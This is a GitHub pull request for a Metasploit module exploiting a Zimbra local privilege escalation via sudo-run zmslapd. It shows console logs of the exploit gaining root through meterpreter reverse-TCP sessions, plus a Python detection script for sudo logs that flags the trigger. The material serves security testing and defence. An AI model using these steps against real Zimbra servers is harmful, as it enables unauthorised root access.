
New module for 0-day Zimbra privilege escalation ("slapper") #16807

Merged (11 commits) Aug 9, 2022

Conversation

@rbowes-r7 rbowes-r7 commented Jul 21, 2022

This adds a local exploit for Zimbra, to go from the zimbra user to root by using a sudo-able executable that can load an arbitrary .so file. This was publicly disclosed in October of 2021, but I'm not sure that anybody reported it to Zimbra. (I reported it today, have not heard back yet)

Note that this is branched off of #16796 since it goes with that module (and is what I'm using for testing) - I'm happy to re-base if that's a problem!

Verification

Install Zimbra (sorry) on any supported Linux version and get a session as the zimbra user. I used Ubuntu 18.04 for testing, and then CVE-2022-30333 to exploit, but this will work on a fully patched system as well. Then...

msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                  Connection
  --  ----  ----                   -----------                  ----------
  10        meterpreter x86/linux  zimbra @ zimbra.example.org  10.0.0.146:4444 -> 10.0.0.154:39800 (10.0.0.154)

msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 10
SESSION => 10
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing: sudo -n -l
[+] The target is vulnerable.
[*] Creating exploit directory: /tmp/.5kq9XO
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3
[*] Sending stage (3020772 bytes) to 10.0.0.154
[+] Deleted /tmp/.5kq9XO
[*] Meterpreter session 13 opened (10.0.0.146:4444 -> 10.0.0.154:40044) at 2022-07-21 14:04:12 -0700

meterpreter > getuid
Server username: root
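The module output above shows the trigger a defender can look for: `sudo` running `/opt/zimbra/libexec/zmslapd` as root with a `-f` config file under `/tmp`. As an added detection example (not part of this PR or of Metasploit), the Python below scans sudo syslog-format entries for that pattern. The log lines are constructed, and the assumption that legitimate slapd configs live under `/opt/zimbra/` is mine.

```python
import re
import shlex

# Constructed sample lines in sudo's syslog format (not from a real host).
SAMPLE_AUTH_LOG = """\
Jul 21 14:04:10 zimbra sudo:   zimbra : TTY=unknown ; PWD=/opt/zimbra ; USER=root ; COMMAND=/opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3
Jul 21 09:00:01 zimbra sudo:   zimbra : TTY=unknown ; PWD=/opt/zimbra ; USER=root ; COMMAND=/opt/zimbra/libexec/zmslapd -l LOCAL0 -u zimbra -g zimbra -F /opt/zimbra/data/ldap/config
Jul 21 09:05:00 zimbra sudo:   admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/systemctl status zimbra
"""

SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:.*?USER=(?P<target>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$"
)
# Assumption: legitimate slapd config files/directories live under the Zimbra install.
TRUSTED_PREFIX = "/opt/zimbra/"


def parse_sudo_line(line):
    """Extract invoking user, target user and command from one sudo log line."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    return {"user": m["user"], "target": m["target"], "cmd": m["cmd"]}


def opt_value(argv, flags):
    """Return the argument following the first of the given flags, or None."""
    for i, arg in enumerate(argv):
        if arg in flags and i + 1 < len(argv):
            return argv[i + 1]
    return None


def find_zmslapd_abuse(log_text):
    """Flag sudo runs of zmslapd that load a config from outside the install or ask to run as root."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_sudo_line(line)
        if rec is None:
            continue
        argv = shlex.split(rec["cmd"])
        if not argv or not argv[0].endswith("/zmslapd"):
            continue
        cfg = opt_value(argv, ("-f", "-F"))  # -f config file, -F config directory
        reasons = []
        if cfg is not None and not cfg.startswith(TRUSTED_PREFIX):
            reasons.append(f"config loaded from outside {TRUSTED_PREFIX}: {cfg}")
        if opt_value(argv, ("-u",)) == "root":
            reasons.append("slapd asked to run as root (-u root)")
        if reasons:
            findings.append({"user": rec["user"], "config": cfg, "reasons": reasons})
    return findings
```

A matching sudoers hardening check is to confirm that the zimbra user's entry for zmslapd does not allow arbitrary arguments; this scanner only covers the after-the-fact log side.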

h00die commented Jul 21, 2022

https://www.youtube.com/watch?v=qPr-xsQvhgw

@github-actions

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@bwatters-r7 bwatters-r7 self-assigned this Aug 1, 2022
bwatters-r7 commented Aug 2, 2022

EDIT: Copy/Pasta fail...
This PR shares code and has dependencies from #16796 and should be landed after it.

cdelafuente-r7 commented Aug 9, 2022

I just tested against Zimbra Collaboration 8.8.15 Patch 31 on Ubuntu 18.04 and it works great! I used CVE-2022-30333 - path traversal vulnerability in UnRAR module to get a session first.

Example output:
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > sessions

Active sessions
===============

  Id  Name  Type                   Information                         Connection
  --  ----  ----                   -----------                         ----------
  1         meterpreter x64/linux  zimbra @ mail.donotexistdomain.foo  10.0.0.1:4444 -> 10.0.0.22:38822 (10.0.0.22)

msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit verbose=true lhost=10.0.0.1 SESSION=1

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing: sudo -n -l
[+] The target appears to be vulnerable.
[*] Creating exploit directory: /tmp/.ng58U2
[*] Creating directory /tmp/.ng58U2
[*] /tmp/.ng58U2 created
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.ng58U2/.SD4X0GB
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.0.0.1
[+] Deleted /tmp/.ng58U2
[*] Meterpreter session 2 opened (10.0.0.1:4444 -> 10.0.0.1:58877) at 2022-08-09 18:03:06 +0200


meterpreter >
meterpreter > sysinfo
Computer     : mail.donotexistdomain.foo
OS           : Ubuntu 18.04 (Linux 5.4.0-122-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root

@bwatters-r7 bwatters-r7 merged commit a8e73d9 into rapid7:master Aug 9, 2022
@bwatters-r7

Release Notes

This PR adds a local exploit for Zimbra to go from the zimbra user to root by using a sudo-able executable that can load an arbitrary .so file.

@jmartin-tech jmartin-tech added the rn-modules release notes for new or majorly enhanced modules label Aug 11, 2022
@fevar54

fevar54 commented Aug 16, 2022

you have resulting indicators of compromise to your test...
Thank you
